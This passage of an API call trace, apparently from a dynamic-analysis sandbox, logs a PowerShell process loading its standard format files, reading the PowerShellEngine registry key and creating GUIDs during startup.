	[0536.827] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad640 | out: lpFileInformation=0xad640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0536.827] SetErrorMode (uMode=0x1) returned 0x1
	[0536.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xad430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0536.827] SetErrorMode (uMode=0x1) returned 0x1
	[0536.827] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad640 | out: lpFileInformation=0xad640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0536.827] SetErrorMode (uMode=0x1) returned 0x1
	[0536.827] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xad430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0536.827] SetErrorMode (uMode=0x1) returned 0x1
	[0536.827] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad640 | out: lpFileInformation=0xad640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0536.827] SetErrorMode (uMode=0x1) returned 0x1
	[0536.828] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xad430, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0536.828] SetErrorMode (uMode=0x1) returned 0x1
	[0536.828] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad640 | out: lpFileInformation=0xad640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0536.828] SetErrorMode (uMode=0x1) returned 0x1
	[0536.829] CoTaskMemAlloc (cb=0x104) returned 0x19b1a0
	[0536.829] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b1a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0536.829] CoTaskMemFree (pv=0x19b1a0) 
	[0537.976] CoTaskMemAlloc (cb=0x104) returned 0x19b1a0
	[0537.976] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b1a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0537.976] CoTaskMemFree (pv=0x19b1a0) 
	[0537.978] CoTaskMemAlloc (cb=0x104) returned 0x19b1a0
	[0537.978] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b1a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0537.978] CoTaskMemFree (pv=0x19b1a0) 
	[0537.980] CoTaskMemAlloc (cb=0x104) returned 0x19b1a0
	[0537.980] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x19b1a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0537.980] CoTaskMemFree (pv=0x19b1a0) 
	[0537.981] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xacd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0537.981] SetErrorMode (uMode=0x1) returned 0x1
	[0537.981] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0537.982] GetFileType (hFile=0x2f8) returned 0x1
	[0537.982] SetErrorMode (uMode=0x1) returned 0x1
	[0537.982] GetFileType (hFile=0x2f8) returned 0x1
	[0537.982] ReadFile (in: hFile=0x2f8, lpBuffer=0x338a118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x338a118*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0537.984] ReadFile (in: hFile=0x2f8, lpBuffer=0x338a118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x338a118*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0537.985] ReadFile (in: hFile=0x2f8, lpBuffer=0x338a118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x338a118*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0537.985] ReadFile (in: hFile=0x2f8, lpBuffer=0x338a118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x338a118*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0537.985] ReadFile (in: hFile=0x2f8, lpBuffer=0x338a118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x338a118*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0537.986] ReadFile (in: hFile=0x2f8, lpBuffer=0x338a118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x338a118*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0537.986] ReadFile (in: hFile=0x2f8, lpBuffer=0x338a118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x338a118*, lpNumberOfBytesRead=0xad2d8*=0x9e2, lpOverlapped=0x0) returned 1
	[0537.986] ReadFile (in: hFile=0x2f8, lpBuffer=0x3389662, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x3389662*, lpNumberOfBytesRead=0xad2d8*=0x0, lpOverlapped=0x0) returned 1
	[0537.986] ReadFile (in: hFile=0x2f8, lpBuffer=0x338a118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x338a118*, lpNumberOfBytesRead=0xad2d8*=0x0, lpOverlapped=0x0) returned 1
	[0537.986] CloseHandle (hObject=0x2f8) returned 1
	[0537.986] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xad020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0537.986] SetErrorMode (uMode=0x1) returned 0x1
	[0537.986] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad280 | out: lpFileInformation=0xad280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0537.986] SetErrorMode (uMode=0x1) returned 0x1
	[0537.987] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xacfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0537.987] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xad368 | out: phkResult=0xad368*=0x2f8) returned 0x0
	[0537.987] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad2ec, lpData=0x0, lpcbData=0xad2e8*=0x0 | out: lpType=0xad2ec*=0x1, lpData=0x0, lpcbData=0xad2e8*=0x56) returned 0x0
	[0537.987] CoTaskMemAlloc (cb=0x5a) returned 0x2564a0
	[0537.987] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad2bc, lpData=0x2564a0, lpcbData=0xad2b8*=0x56 | out: lpType=0xad2bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xad2b8*=0x56) returned 0x0
	[0537.987] CoTaskMemFree (pv=0x2564a0) 
	[0537.987] RegCloseKey (hKey=0x2f8) returned 0x0
	[0537.987] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xacfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0537.987] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xace60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0537.996] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x8fcd6686, Data2=0xa2eb, Data3=0x4efd, Data4=([0]=0x94, [1]=0x8, [2]=0x5, [3]=0xbf, [4]=0xf5, [5]=0x70, [6]=0x3, [7]=0xff))) returned 0x0
	[0537.999] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x780bde89, Data2=0x5c4, Data3=0x4872, Data4=([0]=0x92, [1]=0x49, [2]=0x44, [3]=0x9f, [4]=0xb9, [5]=0x24, [6]=0xea, [7]=0x77))) returned 0x0
	[0538.879] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0538.880] GetFileType (hFile=0x2f8) returned 0x1
	[0538.880] SetErrorMode (uMode=0x1) returned 0x1
	[0538.880] GetFileType (hFile=0x2f8) returned 0x1
	[0538.880] ReadFile (in: hFile=0x2f8, lpBuffer=0x33b4c80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x33b4c80*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0538.881] ReadFile (in: hFile=0x2f8, lpBuffer=0x33b4c80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x33b4c80*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0538.882] ReadFile (in: hFile=0x2f8, lpBuffer=0x33b4c80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x33b4c80*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0538.882] ReadFile (in: hFile=0x2f8, lpBuffer=0x33b4c80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x33b4c80*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0538.883] ReadFile (in: hFile=0x2f8, lpBuffer=0x33b4c80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x33b4c80*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0538.884] ReadFile (in: hFile=0x2f8, lpBuffer=0x33b4c80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x33b4c80*, lpNumberOfBytesRead=0xad2d8*=0xfb2, lpOverlapped=0x0) returned 1
	[0538.884] ReadFile (in: hFile=0x2f8, lpBuffer=0x33b439a, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x33b439a*, lpNumberOfBytesRead=0xad2d8*=0x0, lpOverlapped=0x0) returned 1
	[0538.884] ReadFile (in: hFile=0x2f8, lpBuffer=0x33b4c80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x33b4c80*, lpNumberOfBytesRead=0xad2d8*=0x0, lpOverlapped=0x0) returned 1
	[0538.884] CloseHandle (hObject=0x2f8) returned 1
	[0538.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xad020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0538.884] SetErrorMode (uMode=0x1) returned 0x1
	[0538.885] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad280 | out: lpFileInformation=0xad280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0538.885] SetErrorMode (uMode=0x1) returned 0x1
	[0538.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0538.885] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xad368 | out: phkResult=0xad368*=0x2f8) returned 0x0
	[0538.885] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad2ec, lpData=0x0, lpcbData=0xad2e8*=0x0 | out: lpType=0xad2ec*=0x1, lpData=0x0, lpcbData=0xad2e8*=0x56) returned 0x0
	[0538.885] CoTaskMemAlloc (cb=0x5a) returned 0x2564a0
	[0538.885] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad2bc, lpData=0x2564a0, lpcbData=0xad2b8*=0x56 | out: lpType=0xad2bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xad2b8*=0x56) returned 0x0
	[0538.885] CoTaskMemFree (pv=0x2564a0) 
	[0538.886] RegCloseKey (hKey=0x2f8) returned 0x0
	[0538.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0538.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xace60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0538.888] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x5e188278, Data2=0x6c75, Data3=0x4b19, Data4=([0]=0xb1, [1]=0x72, [2]=0x2f, [3]=0xcf, [4]=0x4d, [5]=0xb1, [6]=0xb3, [7]=0xf8))) returned 0x0
	[0538.893] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xa9136001, Data2=0x55fb, Data3=0x45e5, Data4=([0]=0x92, [1]=0xdf, [2]=0xe4, [3]=0x7d, [4]=0xf7, [5]=0xda, [6]=0x4, [7]=0x6c))) returned 0x0
	[0538.895] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xabbe3b7b, Data2=0x7fe5, Data3=0x4bf7, Data4=([0]=0xac, [1]=0x17, [2]=0xde, [3]=0x83, [4]=0xb1, [5]=0xb, [6]=0xfd, [7]=0x51))) returned 0x0
	[0538.895] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0x500c98dd, Data2=0xe4e1, Data3=0x4561, Data4=([0]=0x80, [1]=0xb8, [2]=0x5c, [3]=0xa0, [4]=0xf3, [5]=0x96, [6]=0x8a, [7]=0x2a))) returned 0x0
	[0538.896] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xa5e22fda, Data2=0x47de, Data3=0x4951, Data4=([0]=0xbb, [1]=0xb8, [2]=0x6d, [3]=0xd1, [4]=0x2d, [5]=0x5, [6]=0x82, [7]=0x1))) returned 0x0
	[0538.897] CoCreateGuid (in: pguid=0xad590 | out: pguid=0xad590*(Data1=0xf7bbecbb, Data2=0x2d99, Data3=0x41bc, Data4=([0]=0x8e, [1]=0xf9, [2]=0xd4, [3]=0x0, [4]=0xa7, [5]=0xff, [6]=0xf9, [7]=0xd9))) returned 0x0
	[0538.897] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0538.898] SetErrorMode (uMode=0x1) returned 0x1
	[0538.898] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0538.898] GetFileType (hFile=0x2f8) returned 0x1
	[0538.898] SetErrorMode (uMode=0x1) returned 0x1
	[0538.898] GetFileType (hFile=0x2f8) returned 0x1
	[0538.898] ReadFile (in: hFile=0x2f8, lpBuffer=0x34009e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x34009e0*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0538.899] ReadFile (in: hFile=0x2f8, lpBuffer=0x34009e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x34009e0*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0538.900] ReadFile (in: hFile=0x2f8, lpBuffer=0x34009e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x34009e0*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0538.900] ReadFile (in: hFile=0x2f8, lpBuffer=0x34009e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x34009e0*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0538.901] ReadFile (in: hFile=0x2f8, lpBuffer=0x34009e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x34009e0*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0538.901] ReadFile (in: hFile=0x2f8, lpBuffer=0x34009e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x34009e0*, lpNumberOfBytesRead=0xad2d8*=0x1000, lpOverlapped=0x0) returned 1
	[0538.902] ReadFile (in: hFile=0x2f8, lpBuffer=0x34009e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x34009e0*, lpNumberOfBytesRead=0xad2d8*=0xaca, lpOverlapped=0x0) returned 1
	[0538.902] ReadFile (in: hFile=0x2f8, lpBuffer=0x3400012, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x3400012*, lpNumberOfBytesRead=0xad2d8*=0x0, lpOverlapped=0x0) returned 1
	[0538.902] ReadFile (in: hFile=0x2f8, lpBuffer=0x34009e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xad2d8, lpOverlapped=0x0 | out: lpBuffer=0x34009e0*, lpNumberOfBytesRead=0xad2d8*=0x0, lpOverlapped=0x0) returned 1
	[0538.902] CloseHandle (hObject=0x2f8) returned 1
	[0538.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xad020, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0538.902] SetErrorMode (uMode=0x1) returned 0x1
	[0538.902] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xad280 | out: lpFileInformation=0xad280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0538.903] SetErrorMode (uMode=0x1) returned 0x1
	[0538.903] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0538.903] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xad368 | out: phkResult=0xad368*=0x2f8) returned 0x0
	[0538.903] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad2ec, lpData=0x0, lpcbData=0xad2e8*=0x0 | out: lpType=0xad2ec*=0x1, lpData=0x0, lpcbData=0xad2e8*=0x56) returned 0x0
	[0538.903] CoTaskMemAlloc (cb=0x5a) returned 0x2564a0
	[0538.903] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xad2bc, lpData=0x2564a0, lpcbData=0xad2b8*=0x56 | out: lpType=0xad2bc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xad2b8*=0x56) returned 0x0
	[0538.903] CoTaskMemFree (pv=0x2564a0) 
	[0538.903] RegCloseKey (hKey=0x2f8) returned 0x0
	[0538.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xacfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0538.904] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xace60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0539.022] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0xac7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0539.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xac7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0540.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0xac7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
